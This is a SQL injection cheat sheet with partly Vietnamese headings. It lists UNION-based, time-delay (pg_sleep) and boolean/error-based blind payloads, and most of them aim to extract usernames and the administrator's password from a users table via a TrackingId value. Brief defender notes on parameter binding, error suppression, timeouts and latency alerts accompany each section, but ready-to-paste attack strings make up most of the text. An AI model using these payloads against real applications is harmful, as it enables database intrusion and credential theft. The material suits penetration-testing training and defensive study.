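CHEATSHEET FOR SQLI
Every entry below only has an effect when the application concatenates the request value into the SQL text. With bound parameters (prepared statements) the same input is compared as a literal string and the query structure does not change.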
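CHECK SỐ CỘT (column count, UNION-based)
A UNION SELECT whose column count or column types do not match the original query makes the database raise an error. These probes depend on the client seeing that error or a changed page, so log database errors server-side and return a generic response.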
‘+UNION+SELECT+NULL,NULL—
‘+UNION+SELECT+‘abcdef’,NULL,NULL—
‘+UNION+SELECT+username,+password+FROM+users—
‘+UNION+SELECT+NULL,username||’~‘||password+FROM+users—
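CHECK TIME DELAY (time-based blind; pg_sleep is PostgreSQL-specific)
Defender view: the response is delayed only when the injected condition holds, so a request whose latency tracks a number inside its own parameter is the signal to alert on. A statement_timeout set on the application's database role bounds how long any such statement can run.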
’ AND (SELECT pg_sleep(10)) IS NULL—
’ AND (SELECT 1 FROM pg_sleep(10)) = 1—
’ || pg_sleep(10)—
' || (select case when (select '1' from user) = '1' then pg_sleep(10) else pg_sleep(0) end)--
' || (select case when (username='administrator' AND LENGTH(password)>3) then pg_sleep(5) else pg_sleep(0) end from users)--
' || (select case when (select length(password) from users where username = 'administrator') > 2 then pg_sleep(5) else pg_sleep(0) end)--
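CHECK ĐIỀU KIỆN (conditional: boolean-based and error-based blind)
The entries using LIMIT and cast(... as int) are PostgreSQL-style; the entries using dual, ROWNUM and TO_CHAR(1/0) are Oracle. All of them rely on the client observing a difference between two outcomes: changed page content, an error status, or echoed database error text. Do not echo database error text, and bind the TrackingId value as a parameter instead of concatenating it.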
TrackingId=xyz’ AND ‘1’=‘1
TrackingId=xyz’ AND ‘1’=‘2
TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>2)=‘a
TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)=‘a
' and cast((select username from users limit 1) as int)=1--
' and cast((select password from users limit 1) as int)=1--
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||'
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'